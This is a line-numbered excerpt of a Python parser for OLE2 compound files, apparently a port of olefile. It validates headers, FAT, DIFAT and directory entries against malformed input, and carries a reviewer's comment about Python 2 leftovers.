458 | # This number should (at least) be less than the total number of 459 | # sectors in the given FAT: 460 | if nb_sectors > len(fat): 461 | 462 | raise IOError('malformed OLE document, stream too large') 463 | # optimization(?): data is first a list of strings, and join() is called 464 | # at the end to concatenate all in one string.
465 | # (this may not be really useful with recent Python versions) 466 | data = [] 467 | # if size is zero, then first sector index should be ENDOFCHAIN: 468 | if size == 0 and sect != ENDOFCHAIN: 469 | debug('size == 0 and sect != ENDOFCHAIN:') 470 | raise IOError('incorrect OLE sector index for empty stream') 471 | #[PL] A fixed-length for loop is used instead of an undefined while 472 | # loop to avoid DoS attacks: 473 | for i in range(nb_sectors): 474 | # Sector index may be ENDOFCHAIN, but only if size was unknown 475 | if sect == ENDOFCHAIN: 476 | if unknown_size: 477 | break 478 | else: 479 | # else this means that the stream is smaller than declared: 480 | debug('sect=ENDOFCHAIN before expected size') 481 | raise IOError('incomplete OLE stream') 482 | # sector index should be within FAT: 483 | if sect<0 or sect>=len(fat): 484 | debug('sect=%d (%X) / len(fat)=%d' % (sect, sect, len(fat))) 485 | debug('i=%d / nb_sectors=%d' %(i, nb_sectors)) 486 | ## tmp_data = string.join(data, "") 487 | ## f = open('test_debug.bin', 'wb') 488 | ## f.write(tmp_data) 489 | ## f.close() 490 | ## debug('data read so far: %d bytes' % len(tmp_data)) 491 | raise IOError('incorrect OLE FAT, sector index out of range') 492 | #TODO: merge this code with OleFileIO.getsect() ? 493 | #TODO: check if this works with 4K sectors: 494 | try: 495 | fp.seek(offset + sectorsize * sect) 496 | except: 497 | debug('sect=%d, seek=%d, filesize=%d' % 498 | (sect, offset+sectorsize*sect, filesize)) 499 | raise IOError('OLE sector index out of range') 500 | sector_data = fp.read(sectorsize) 501 | # [PL] check if there was enough data: 502 | # Note: if sector is the last of the file, sometimes it is not a 503 | # complete sector (of 512 or 4K), so we may read less than 504 | # sectorsize.
505 | if len(sector_data)!=sectorsize and sect!=(len(fat)-1): 506 | debug('sect=%d / len(fat)=%d, seek=%d / filesize=%d, len read=%d' % 507 | (sect, len(fat), offset+sectorsize*sect, filesize, len(sector_data))) 508 | debug('seek+len(read)=%d' % (offset+sectorsize*sect+len(sector_data))) 509 | raise IOError('incomplete OLE sector') 510 | data.append(sector_data) 511 | # jump to next sector in the FAT: 512 | try: 513 | sect = fat[sect] 514 | except IndexError: 515 | # [PL] if pointer is out of the FAT an exception is raised 516 | raise IOError('incorrect OLE FAT, sector index out of range') 517 | #[PL] Last sector should be a "end of chain" marker: 518 | if sect != ENDOFCHAIN: 519 | raise IOError('incorrect last sector index in OLE stream') 520 | data = b"".join(data) 521 | # data = string.join(data, "") 522 | # Data is truncated to the actual stream size: 523 | if len(data) >= size: 524 | data = data[:size] 525 | # actual stream size is stored for future use: 526 | self.size = size 527 | elif unknown_size: 528 | # actual stream size was not known, now we know the size of read 529 | # data: 530 | self.size = len(data) 531 | else: 532 | # read data is less than expected: 533 | debug('len(data)=%d, size=%d' % (len(data), size)) 534 | raise IOError('OLE stream size is less than declared') 535 | # when all data is read in memory, StringIO constructor is called 536 | StringIO.__init__(self, data) 537 | # Then the _OleStream object can be used as a read-only file object.
# ---------------------------------------------------------------------------
# NOTE(review): _OleDirectoryEntry (original lines 538-711).  __init__
# parses one 128-byte directory entry with STRUCT_DIRENTRY ('<64sHBBIII16s
# I8s8sIII'), validates the entry type, root placement and name length via
# olefile._raise_defect, converts the UTF-16LE name through _unicode(), and
# registers stream starts with _check_duplicate_stream.  build_storage_tree/
# append_kids recurse over the red-black child tree to fill self.kids.
# append_kids is cut off at the end of this chunk, so the class is kept
# byte-identical.  Watch: `long(sizeHigh)` on the 4K-sector path is
# Python 2 only — would NameError under Py3 (TODO confirm against upstream
# olefile, which later fixed this).
# ---------------------------------------------------------------------------
538 | 539 | 540 | #--- _OleDirectoryEntry ------------------------------------------------------- 541 | 542 | class _OleDirectoryEntry: 543 | 544 | """ 545 | OLE2 Directory Entry 546 | """ 547 | #[PL] parsing code moved from OleFileIO.loaddirectory 548 | 549 | # struct to parse directory entries: 550 | # <: little-endian byte order 551 | # 64s: string containing entry name in unicode (max 31 chars) + null char 552 | # H: uint16, number of bytes used in name buffer, including null = (len+1)*2 553 | # B: uint8, dir entry type (between 0 and 5) 554 | # B: uint8, color: 0=black, 1=red 555 | # I: uint32, index of left child node in the red-black tree, NOSTREAM if none 556 | # I: uint32, index of right child node in the red-black tree, NOSTREAM if none 557 | # I: uint32, index of child root node if it is a storage, else NOSTREAM 558 | # 16s: CLSID, unique identifier (only used if it is a storage) 559 | # I: uint32, user flags 560 | # 8s: uint64, creation timestamp or zero 561 | # 8s: uint64, modification timestamp or zero 562 | # I: uint32, SID of first sector if stream or ministream, SID of 1st sector 563 | # of stream containing ministreams if root entry, 0 otherwise 564 | # I: uint32, total stream size in bytes if stream (low 32 bits), 0 otherwise 565 | # I: uint32, total stream size in bytes if stream (high 32 bits), 0 otherwise 566 | STRUCT_DIRENTRY = '<64sHBBIII16sI8s8sIII' 567 | # size of a directory entry: 128 bytes 568 | DIRENTRY_SIZE = 128 569 | assert struct.calcsize(STRUCT_DIRENTRY) == DIRENTRY_SIZE 570 | 571 | 572 | def __init__(self, entry, sid, olefile): 573 | """ 574 | Constructor for an _OleDirectoryEntry object. 575 | Parses a 128-bytes entry from the OLE Directory stream.
576 | 577 | entry : string (must be 128 bytes long) 578 | sid : index of this directory entry in the OLE file directory 579 | olefile: OleFileIO containing this directory entry 580 | """ 581 | self.sid = sid 582 | # ref to olefile is stored for future use 583 | self.olefile = olefile 584 | # kids is a list of children entries, if this entry is a storage: 585 | # (list of _OleDirectoryEntry objects) 586 | self.kids = [] 587 | # kids_dict is a dictionary of children entries, indexed by their 588 | # name in lowercase: used to quickly find an entry, and to detect 589 | # duplicates 590 | self.kids_dict = {} 591 | # flag used to detect if the entry is referenced more than once in 592 | # directory: 593 | self.used = False 594 | # decode DirEntry 595 | ( 596 | name, 597 | namelength, 598 | self.entry_type, 599 | self.color, 600 | self.sid_left, 601 | self.sid_right, 602 | self.sid_child, 603 | clsid, 604 | self.dwUserFlags, 605 | self.createTime, 606 | self.modifyTime, 607 | self.isectStart, 608 | sizeLow, 609 | sizeHigh 610 | ) = struct.unpack(_OleDirectoryEntry.STRUCT_DIRENTRY, entry) 611 | if self.entry_type not in [STGTY_ROOT, STGTY_STORAGE, STGTY_STREAM, STGTY_EMPTY]: 612 | olefile._raise_defect(DEFECT_INCORRECT, 'unhandled OLE storage type') 613 | # only first directory entry can (and should) be root: 614 | if self.entry_type == STGTY_ROOT and sid != 0: 615 | olefile._raise_defect(DEFECT_INCORRECT, 'duplicate OLE root entry') 616 | if sid == 0 and self.entry_type != STGTY_ROOT: 617 | olefile._raise_defect(DEFECT_INCORRECT, 'incorrect OLE root entry') 618 | #debug (struct.unpack(fmt_entry, entry[:len_entry])) 619 | # name should be at most 31 unicode characters + null character, 620 | # so 64 bytes in total (31*2 + 2): 621 | if namelength>64: 622 | olefile._raise_defect(DEFECT_INCORRECT, 'incorrect DirEntry name length') 623 | # if exception not raised, namelength is set to the maximum value: 624 | namelength = 64 625 | # only characters without ending null char
are kept: 626 | name = name[:(namelength-2)] 627 | # name is converted from unicode to Latin-1: 628 | self.name = _unicode(name) 629 | 630 | debug('DirEntry SID=%d: %s' % (self.sid, repr(self.name))) 631 | debug(' - type: %d' % self.entry_type) 632 | debug(' - sect: %d' % self.isectStart) 633 | debug(' - SID left: %d, right: %d, child: %d' % (self.sid_left, 634 | self.sid_right, self.sid_child)) 635 | 636 | # sizeHigh is only used for 4K sectors, it should be zero for 512 bytes 637 | # sectors, BUT apparently some implementations set it as 0xFFFFFFFFL, 1 638 | # or some other value so it cannot be raised as a defect in general: 639 | if olefile.sectorsize == 512: 640 | if sizeHigh != 0 and sizeHigh != 0xFFFFFFFF: 641 | debug('sectorsize=%d, sizeLow=%d, sizeHigh=%d (%X)' % 642 | (olefile.sectorsize, sizeLow, sizeHigh, sizeHigh)) 643 | olefile._raise_defect(DEFECT_UNSURE, 'incorrect OLE stream size') 644 | self.size = sizeLow 645 | else: 646 | self.size = sizeLow + (long(sizeHigh)<<32) 647 | debug(' - size: %d (sizeLow=%d, sizeHigh=%d)' % (self.size, sizeLow, sizeHigh)) 648 | 649 | # self.clsid = _clsid(clsid) 650 | # a storage should have a null size, BUT some implementations such as 651 | # Word 8 for Mac seem to allow non-null values => Potential defect: 652 | if self.entry_type == STGTY_STORAGE and self.size != 0: 653 | olefile._raise_defect(DEFECT_POTENTIAL, 'OLE storage with size>0') 654 | # check if stream is not already referenced elsewhere: 655 | if self.entry_type in (STGTY_ROOT, STGTY_STREAM) and self.size>0: 656 | if self.size < olefile.minisectorcutoff \ 657 | and self.entry_type==STGTY_STREAM: # only streams can be in MiniFAT 658 | # ministream object 659 | minifat = True 660 | else: 661 | minifat = False 662 | olefile._check_duplicate_stream(self.isectStart, minifat) 663 | 664 | 665 | 666 | def build_storage_tree(self): 667 | """ 668 | Read and build the red-black tree attached to this _OleDirectoryEntry 669 | object, if it is a storage.
670 | Note that this method builds a tree of all subentries, so it should 671 | only be called for the root object once. 672 | """ 673 | debug('build_storage_tree: SID=%d - %s - sid_child=%d' 674 | % (self.sid, repr(self.name), self.sid_child)) 675 | if self.sid_child != NOSTREAM: 676 | # if child SID is not NOSTREAM, then this entry is a storage. 677 | # Let's walk through the tree of children to fill the kids list: 678 | self.append_kids(self.sid_child) 679 | 680 | # Note from OpenOffice documentation: the safest way is to 681 | # recreate the tree because some implementations may store broken 682 | # red-black trees... 683 | 684 | # in the OLE file, entries are sorted on (length, name). 685 | # for convenience, we sort them on name instead: 686 | # (see __cmp__ method in this class) 687 | # self.kids.sort() 688 | 689 | 690 | def append_kids(self, child_sid): 691 | """ 692 | Walk through red-black tree of children of this directory entry to add 693 | all of them to the kids list. (recursive method) 694 | 695 | child_sid : index of child directory entry to use, or None when called 696 | first time for the root. (only used during recursion) 697 | """ 698 | #[PL] this method was added to use simple recursion instead of a complex 699 | # algorithm. 700 | # if this is not a storage or a leaf of the tree, nothing to do: 701 | if child_sid == NOSTREAM: 702 | return 703 | # check if child SID is in the proper range: 704 | if child_sid<0 or child_sid>=len(self.olefile.direntries): 705 | self.olefile._raise_defect(DEFECT_FATAL, 'OLE DirEntry index out of range') 706 | # get child direntry: 707 | child = self.olefile._load_direntry(child_sid) #direntries[child_sid] 708 | debug('append_kids: child_sid=%d - %s - sid_left=%d, sid_right=%d, sid_child=%d' 709 | % (child.sid, repr(child.name), child.sid_left, child.sid_right, child.sid_child)) 710 | # the directory entries are organized as a red-black tree. 711 | # (cf.
Wikipedia for details) 712 | # First walk through left side of the tree: 713 | self.append_kids(child.sid_left) 714 | # Check if its name is not already used (case-insensitive): 715 | # name_lower = child.name 716 | child.name = child.name.decode() 717 | name_lower = child.name.lower() 718 | if self.kids_dict.get(name_lower, None): 719 | self.olefile._raise_defect(DEFECT_INCORRECT, 720 | "Duplicate filename in OLE storage") 721 | # Then the child_sid _OleDirectoryEntry object is appended to the 722 | # kids list and dictionary: 723 | self.kids.append(child) 724 | self.kids_dict[name_lower] = child 725 | # Check if kid was not already referenced in a storage: 726 | if child.used: 727 | self.olefile._raise_defect(DEFECT_INCORRECT, 728 | 'OLE Entry referenced more than once') 729 | child.used = True 730 | # Finally walk through right side of the tree: 731 | self.append_kids(child.sid_right) 732 | # Afterwards build kid's own tree if it's also a storage: 733 | child.build_storage_tree() 734 | 735 | 736 | def __cmp__(self, other): 737 | "Compare entries by name" 738 | return cmp(self.name, other.name) 739 | #TODO: replace by the same function as MS implementation ? 740 | # (order by name length first, then case-insensitive order) 741 | 742 | 743 | 744 | #--- OleFileIO ---------------------------------------------------------------- 745 | 746 | class OleFileIO: 747 | """ 748 | OLE container object 749 | 750 | This class encapsulates the interface to an OLE 2 structured 751 | storage file. Use the {@link listdir} and {@link openstream} methods to 752 | access the contents of this file. 753 | 754 | Object names are given as a list of strings, one for each subentry 755 | level. The root entry should be omitted. 
For example, the following 756 | code extracts all image streams from a Microsoft Image Composer file: 757 | 758 | ole = OleFileIO("fan.mic") 759 | 760 | for entry in ole.listdir(): 761 | if entry[1:2] == "Image": 762 | fin = ole.openstream(entry) 763 | fout = open(entry[0:1], "wb") 764 | while 1: 765 | s = fin.read(8192) 766 | if not s: 767 | break 768 | fout.write(s) 769 | 770 | You can use the viewer application provided with the Python Imaging 771 | Library to view the resulting files (which happens to be standard 772 | TIFF files). 773 | """ 774 | 775 | def __init__(self, filename = None, raise_defects=DEFECT_FATAL): 776 | """ 777 | Constructor for OleFileIO class. 778 | 779 | filename: file to open. 780 | raise_defects: minimal level for defects to be raised as exceptions. 781 | (use DEFECT_FATAL for a typical application, DEFECT_INCORRECT for a 782 | security-oriented application, see source code for details) 783 | """ 784 | self._raise_defects_level = raise_defects 785 | if filename: 786 | self.open(filename) 787 | 788 | 789 | def _raise_defect(self, defect_level, message): 790 | """ 791 | This method should be called for any defect found during file parsing. 792 | It may raise an IOError exception according to the minimal level chosen 793 | for the OleFileIO object. 794 | 795 | defect_level: defect level, possible values are: 796 | DEFECT_UNSURE : a case which looks weird, but not sure it's a defect 797 | DEFECT_POTENTIAL : a potential defect 798 | DEFECT_INCORRECT : an error according to specifications, but parsing can go on 799 | DEFECT_FATAL : an error which cannot be ignored, parsing is impossible 800 | message: string describing the defect, used with raised exception. 801 | """ 802 | # added by [PL] 803 | if defect_level >= self._raise_defects_level: 804 | raise IOError(message) 805 | 806 | 807 | def open(self, filename): 808 | """ 809 | Open an OLE2 file. 810 | Reads the header, FAT and directory. 
811 | 812 | filename: string-like or file-like object 813 | """ 814 | #[PL] check if filename is a string-like or file-like object: 815 | # (it is better to check for a read() method) 816 | if hasattr(filename, 'read'): 817 | # file-like object 818 | self.fp = filename 819 | else: 820 | # string-like object: filename of file on disk 821 | #TODO: if larger than 1024 bytes, this could be the actual data => StringIO 822 | self.fp = open(filename, "rb") 823 | # old code fails if filename is not a plain string: 824 | #if type(filename) == type(""): 825 | # self.fp = open(filename, "rb") 826 | #else: 827 | # self.fp = filename 828 | # obtain the filesize by using seek and tell, which should work on most 829 | # file-like objects: 830 | #TODO: do it above, using getsize with filename when possible? 831 | #TODO: fix code to fail with clear exception when filesize cannot be obtained 832 | self.fp.seek(0, os.SEEK_END) 833 | try: 834 | filesize = self.fp.tell() 835 | finally: 836 | self.fp.seek(0) 837 | self._filesize = filesize 838 | 839 | # lists of streams in FAT and MiniFAT, to detect duplicate references 840 | # (list of indexes of first sectors of each stream) 841 | self._used_streams_fat = [] 842 | self._used_streams_minifat = [] 843 | 844 | header = self.fp.read(512) 845 | 846 | if len(header) != 512 or header[:8] != MAGIC: 847 | self._raise_defect(DEFECT_FATAL, "not an OLE2 structured storage file") 848 | 849 | # [PL] header structure according to AAF specifications: 850 | ##Header 851 | ##struct StructuredStorageHeader { // [offset from start (bytes), length (bytes)] 852 | ##BYTE _abSig[8]; // [00H,08] {0xd0, 0xcf, 0x11, 0xe0, 0xa1, 0xb1, 853 | ## // 0x1a, 0xe1} for current version 854 | ##CLSID _clsid; // [08H,16] reserved must be zero (WriteClassStg/ 855 | ## // GetClassFile uses root directory class id) 856 | ##USHORT _uMinorVersion; // [18H,02] minor version of the format: 33 is 857 | ## // written by reference implementation 858 | ##USHORT _uDllVersion; // 
[1AH,02] major version of the dll/format: 3 for 859 | ## // 512-byte sectors, 4 for 4 KB sectors 860 | ##USHORT _uByteOrder; // [1CH,02] 0xFFFE: indicates Intel byte-ordering 861 | ##USHORT _uSectorShift; // [1EH,02] size of sectors in power-of-two; 862 | ## // typically 9 indicating 512-byte sectors 863 | ##USHORT _uMiniSectorShift; // [20H,02] size of mini-sectors in power-of-two; 864 | ## // typically 6 indicating 64-byte mini-sectors 865 | ##USHORT _usReserved; // [22H,02] reserved, must be zero 866 | ##ULONG _ulReserved1; // [24H,04] reserved, must be zero 867 | ##FSINDEX _csectDir; // [28H,04] must be zero for 512-byte sectors, 868 | ## // number of SECTs in directory chain for 4 KB 869 | ## // sectors 870 | ##FSINDEX _csectFat; // [2CH,04] number of SECTs in the FAT chain 871 | ##SECT _sectDirStart; // [30H,04] first SECT in the directory chain 872 | ##DFSIGNATURE _signature; // [34H,04] signature used for transactions; must 873 | ## // be zero. The reference implementation 874 | ## // does not support transactions 875 | ##ULONG _ulMiniSectorCutoff; // [38H,04] maximum size for a mini stream; 876 | ## // typically 4096 bytes 877 | ##SECT _sectMiniFatStart; // [3CH,04] first SECT in the MiniFAT chain 878 | ##FSINDEX _csectMiniFat; // [40H,04] number of SECTs in the MiniFAT chain 879 | ##SECT _sectDifStart; // [44H,04] first SECT in the DIFAT chain 880 | ##FSINDEX _csectDif; // [48H,04] number of SECTs in the DIFAT chain 881 | ##SECT _sectFat[109]; // [4CH,436] the SECTs of first 109 FAT sectors 882 | ##}; 883 | 884 | # [PL] header decoding: 885 | # '<' indicates little-endian byte ordering for Intel (cf. 
struct module help) 886 | fmt_header = '<8s16sHHHHHHLLLLLLLLLL' 887 | header_size = struct.calcsize(fmt_header) 888 | debug( "fmt_header size = %d, +FAT = %d" % (header_size, header_size + 109*4) ) 889 | header1 = header[:header_size] 890 | ( 891 | self.Sig, 892 | self.clsid, 893 | self.MinorVersion, 894 | self.DllVersion, 895 | self.ByteOrder, 896 | self.SectorShift, 897 | self.MiniSectorShift, 898 | self.Reserved, self.Reserved1, 899 | self.csectDir, 900 | self.csectFat, 901 | self.sectDirStart, 902 | self.signature, 903 | self.MiniSectorCutoff, 904 | self.MiniFatStart, 905 | self.csectMiniFat, 906 | self.sectDifStart, 907 | self.csectDif 908 | ) = struct.unpack(fmt_header, header1) 909 | debug( struct.unpack(fmt_header, header1)) 910 | 911 | if self.Sig != b'\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1': 912 | # OLE signature should always be present 913 | self._raise_defect(DEFECT_FATAL, "incorrect OLE signature") 914 | if self.clsid != b'\x00'*16: 915 | # according to AAF specs, CLSID should always be zero 916 | self._raise_defect(DEFECT_INCORRECT, "incorrect CLSID in OLE header") 917 | debug( "MinorVersion = %d" % self.MinorVersion ) 918 | debug( "DllVersion = %d" % self.DllVersion ) 919 | if self.DllVersion not in [3, 4]: 920 | # version 3: usual format, 512 bytes per sector 921 | # version 4: large format, 4K per sector 922 | self._raise_defect(DEFECT_INCORRECT, "incorrect DllVersion in OLE header") 923 | debug( "ByteOrder = %X" % self.ByteOrder ) 924 | if self.ByteOrder != 0xFFFE: 925 | # For now only common little-endian documents are handled correctly 926 | self._raise_defect(DEFECT_FATAL, "incorrect ByteOrder in OLE header") 927 | # TODO: add big-endian support for documents created on Mac ? 
928 | self.SectorSize = 2**self.SectorShift 929 | debug( "SectorSize = %d" % self.SectorSize ) 930 | if self.SectorSize not in [512, 4096]: 931 | self._raise_defect(DEFECT_INCORRECT, "incorrect SectorSize in OLE header") 932 | if (self.DllVersion==3 and self.SectorSize!=512) \ 933 | or (self.DllVersion==4 and self.SectorSize!=4096): 934 | self._raise_defect(DEFECT_INCORRECT, "SectorSize does not match DllVersion in OLE header") 935 | self.MiniSectorSize = 2**self.MiniSectorShift 936 | debug( "MiniSectorSize = %d" % self.MiniSectorSize ) 937 | if self.MiniSectorSize not in [64]: 938 | self._raise_defect(DEFECT_INCORRECT, "incorrect MiniSectorSize in OLE header") 939 | if self.Reserved != 0 or self.Reserved1 != 0: 940 | self._raise_defect(DEFECT_INCORRECT, "incorrect OLE header (non-null reserved bytes)") 941 | debug( "csectDir = %d" % self.csectDir ) 942 | if self.SectorSize==512 and self.csectDir!=0: 943 | self._raise_defect(DEFECT_INCORRECT, "incorrect csectDir in OLE header") 944 | debug( "csectFat = %d" % self.csectFat ) 945 | debug( "sectDirStart = %X" % self.sectDirStart ) 946 | debug( "signature = %d" % self.signature ) 947 | # Signature should be zero, BUT some implementations do not follow this 948 | # rule => only a potential defect: 949 | if self.signature != 0: 950 | self._raise_defect(DEFECT_POTENTIAL, "incorrect OLE header (signature>0)") 951 | debug( "MiniSectorCutoff = %d" % self.MiniSectorCutoff ) 952 | debug( "MiniFatStart = %X" % self.MiniFatStart ) 953 | debug( "csectMiniFat = %d" % self.csectMiniFat ) 954 | debug( "sectDifStart = %X" % self.sectDifStart ) 955 | debug( "csectDif = %d" % self.csectDif ) 956 | 957 | # calculate the number of sectors in the file 958 | # (-1 because header doesn't count) 959 | self.nb_sect = ( (filesize + self.SectorSize-1) / self.SectorSize) - 1 960 | debug( "Number of sectors in the file: %d" % self.nb_sect ) 961 | 962 | # file clsid (probably never used, so we don't store it) 963 | # clsid = _clsid(header[8:24]) 
964 | self.sectorsize = self.SectorSize #1 << i16(header, 30) 965 | self.minisectorsize = self.MiniSectorSize #1 << i16(header, 32) 966 | self.minisectorcutoff = self.MiniSectorCutoff # i32(header, 56) 967 | 968 | # check known streams for duplicate references (these are always in FAT, 969 | # never in MiniFAT): 970 | self._check_duplicate_stream(self.sectDirStart) 971 | # check MiniFAT only if it is not empty: 972 | if self.csectMiniFat: 973 | self._check_duplicate_stream(self.MiniFatStart) 974 | # check DIFAT only if it is not empty: 975 | if self.csectDif: 976 | self._check_duplicate_stream(self.sectDifStart) 977 | 978 | # Load file allocation tables 979 | self.loadfat(header) 980 | # Load direcory. This sets both the direntries list (ordered by sid) 981 | # and the root (ordered by hierarchy) members. 982 | self.loaddirectory(self.sectDirStart)#i32(header, 48)) 983 | self.ministream = None 984 | self.minifatsect = self.MiniFatStart #i32(header, 60) 985 | 986 | 987 | def close(self): 988 | """ 989 | close the OLE file, to release the file object 990 | """ 991 | self.fp.close() 992 | 993 | 994 | def _check_duplicate_stream(self, first_sect, minifat=False): 995 | """ 996 | Checks if a stream has not been already referenced elsewhere. 997 | This method should only be called once for each known stream, and only 998 | if stream size is not null. 
999 | first_sect: index of first sector of the stream in FAT 1000 | minifat: if True, stream is located in the MiniFAT, else in the FAT 1001 | """ 1002 | if minifat: 1003 | debug('_check_duplicate_stream: sect=%d in MiniFAT' % first_sect) 1004 | used_streams = self._used_streams_minifat 1005 | else: 1006 | debug('_check_duplicate_stream: sect=%d in FAT' % first_sect) 1007 | # some values can be safely ignored (not a real stream): 1008 | if first_sect in (DIFSECT,FATSECT,ENDOFCHAIN,FREESECT): 1009 | return 1010 | used_streams = self._used_streams_fat 1011 | #TODO: would it be more efficient using a dict or hash values, instead 1012 | # of a list of long ? 1013 | if first_sect in used_streams: 1014 | self._raise_defect(DEFECT_INCORRECT, 'Stream referenced twice') 1015 | else: 1016 | used_streams.append(first_sect) 1017 | 1018 | 1019 | def sect2array(self, sect): 1020 | """ 1021 | convert a sector to an array of 32 bits unsigned integers, 1022 | swapping bytes on big endian CPUs such as PowerPC (old Macs) 1023 | """ 1024 | a = array.array(UINT32, sect) 1025 | # if CPU is big endian, swap bytes: 1026 | if sys.byteorder == 'big': 1027 | a.byteswap() 1028 | return a 1029 | 1030 | 1031 | def loadfat_sect(self, sect): 1032 | """ 1033 | Adds the indexes of the given sector to the FAT 1034 | sect: string containing the first FAT sector, or array of long integers 1035 | return: index of last FAT sector. 1036 | """ 1037 | # a FAT sector is an array of ulong integers. 1038 | if isinstance(sect, array.array): 1039 | # if sect is already an array it is directly used 1040 | fat1 = sect 1041 | else: 1042 | # if it's a raw sector, it is parsed in an array 1043 | fat1 = self.sect2array(sect) 1044 | # self.dumpsect(sect) 1045 | # The FAT is a sector chain starting at the first index of itself. 
1046 | for isect in fat1: 1047 | #print "isect = %X" % isect 1048 | if isect == ENDOFCHAIN or isect == FREESECT: 1049 | # the end of the sector chain has been reached 1050 | break 1051 | # read the FAT sector 1052 | s = self.getsect(isect) 1053 | # parse it as an array of 32 bits integers, and add it to the 1054 | # global FAT array 1055 | nextfat = self.sect2array(s) 1056 | self.fat = self.fat + nextfat 1057 | return isect 1058 | 1059 | 1060 | def loadfat(self, header): 1061 | """ 1062 | Load the FAT table. 1063 | """ 1064 | # The header contains a sector numbers 1065 | # for the first 109 FAT sectors. Additional sectors are 1066 | # described by DIF blocks 1067 | 1068 | sect = header[76:512] 1069 | debug( "len(sect)=%d, so %d integers" % (len(sect), len(sect)/4) ) 1070 | #fat = [] 1071 | # [PL] FAT is an array of 32 bits unsigned ints, it's more effective 1072 | # to use an array than a list in Python. 1073 | # It's initialized as empty first: 1074 | self.fat = array.array(UINT32) 1075 | self.loadfat_sect(sect) 1076 | #self.dumpfat(self.fat) 1077 | ## for i in range(0, len(sect), 4): 1078 | ## ix = i32(sect, i) 1079 | ## #[PL] if ix == -2 or ix == -1: # ix == 0xFFFFFFFEL or ix == 0xFFFFFFFFL: 1080 | ## if ix == 0xFFFFFFFEL or ix == 0xFFFFFFFFL: 1081 | ## break 1082 | ## s = self.getsect(ix) 1083 | ## #fat = fat + map(lambda i, s=s: i32(s, i), range(0, len(s), 4)) 1084 | ## fat = fat + array.array(UINT32, s) 1085 | if self.csectDif != 0: 1086 | # [PL] There's a DIFAT because file is larger than 6.8MB 1087 | # some checks just in case: 1088 | if self.csectFat <= 109: 1089 | # there must be at least 109 blocks in header and the rest in 1090 | # DIFAT, so number of sectors must be >109. 
1091 | self._raise_defect(DEFECT_INCORRECT, 'incorrect DIFAT, not enough sectors') 1092 | if self.sectDifStart >= self.nb_sect: 1093 | # initial DIFAT block index must be valid 1094 | self._raise_defect(DEFECT_FATAL, 'incorrect DIFAT, first index out of range') 1095 | debug( "DIFAT analysis..." ) 1096 | # We compute the necessary number of DIFAT sectors : 1097 | # (each DIFAT sector = 127 pointers + 1 towards next DIFAT sector) 1098 | nb_difat = (self.csectFat-109 + 126)/127 1099 | debug( "nb_difat = %d" % nb_difat ) 1100 | if self.csectDif != nb_difat: 1101 | raise IOError('incorrect DIFAT') 1102 | isect_difat = self.sectDifStart 1103 | for i in xrange(nb_difat): 1104 | debug( "DIFAT block %d, sector %X" % (i, isect_difat) ) 1105 | #TODO: check if corresponding FAT SID = DIFSECT 1106 | sector_difat = self.getsect(isect_difat) 1107 | difat = self.sect2array(sector_difat) 1108 | self.dumpsect(sector_difat) 1109 | self.loadfat_sect(difat[:127]) 1110 | # last DIFAT pointer is next DIFAT sector: 1111 | isect_difat = difat[127] 1112 | debug( "next DIFAT sector: %X" % isect_difat ) 1113 | # checks: 1114 | if isect_difat not in [ENDOFCHAIN, FREESECT]: 1115 | # last DIFAT pointer value must be ENDOFCHAIN or FREESECT 1116 | raise IOError('incorrect end of DIFAT') 1117 | ## if len(self.fat) != self.csectFat: 1118 | ## # FAT should contain csectFat blocks 1119 | ## print "FAT length: %d instead of %d" % (len(self.fat), self.csectFat) 1120 | ## raise IOError, 'incorrect DIFAT' 1121 | # since FAT is read from fixed-size sectors, it may contain more values 1122 | # than the actual number of sectors in the file. 1123 | # Keep only the relevant sector indexes: 1124 | if len(self.fat) > self.nb_sect: 1125 | debug('len(fat)=%d, shrunk to nb_sect=%d' % (len(self.fat), self.nb_sect)) 1126 | self.fat = self.fat[:int(self.nb_sect)] 1127 | debug('\nFAT:') 1128 | #self.dumpfat(self.fat) 1129 | 1130 | 1131 | def loadminifat(self): 1132 | """ 1133 | Load the MiniFAT table. 
1134 | """ 1135 | # MiniFAT is stored in a standard sub-stream, pointed to by a header 1136 | # field. 1137 | # NOTE: there are two sizes to take into account for this stream: 1138 | # 1) Stream size is calculated according to the number of sectors 1139 | # declared in the OLE header. This allocated stream may be more than 1140 | # needed to store the actual sector indexes. 1141 | # (self.csectMiniFat is the number of sectors of size self.SectorSize) 1142 | stream_size = self.csectMiniFat * self.SectorSize 1143 | # 2) Actually used size is calculated by dividing the MiniStream size 1144 | # (given by root entry size) by the size of mini sectors, *4 for 1145 | # 32 bits indexes: 1146 | nb_minisectors = (self.root.size + self.MiniSectorSize-1) / self.MiniSectorSize 1147 | used_size = nb_minisectors * 4 1148 | debug('loadminifat(): minifatsect=%d, nb FAT sectors=%d, used_size=%d, stream_size=%d, nb MiniSectors=%d' % 1149 | (self.minifatsect, self.csectMiniFat, used_size, stream_size, nb_minisectors)) 1150 | if used_size > stream_size: 1151 | # This is not really a problem, but may indicate a wrong implementation: 1152 | self._raise_defect(DEFECT_INCORRECT, 'OLE MiniStream is larger than MiniFAT') 1153 | # In any case, first read stream_size: 1154 | s = self._open(self.minifatsect, stream_size, force_FAT=True).read() 1155 | #[PL] Old code replaced by an array: 1156 | #self.minifat = map(lambda i, s=s: i32(s, i), range(0, len(s), 4)) 1157 | self.minifat = self.sect2array(s) 1158 | # Then shrink the array to used size, to avoid indexes out of MiniStream: 1159 | debug('MiniFAT shrunk from %d to %d sectors' % (len(self.minifat), nb_minisectors)) 1160 | self.minifat = self.minifat[:int(nb_minisectors)] 1161 | debug('loadminifat(): len=%d' % len(self.minifat)) 1162 | debug('\nMiniFAT:') 1163 | # self.dumpfat(self.minifat) 1164 | 1165 | def getsect(self, sect): 1166 | """ 1167 | Read given sector from file on disk. 
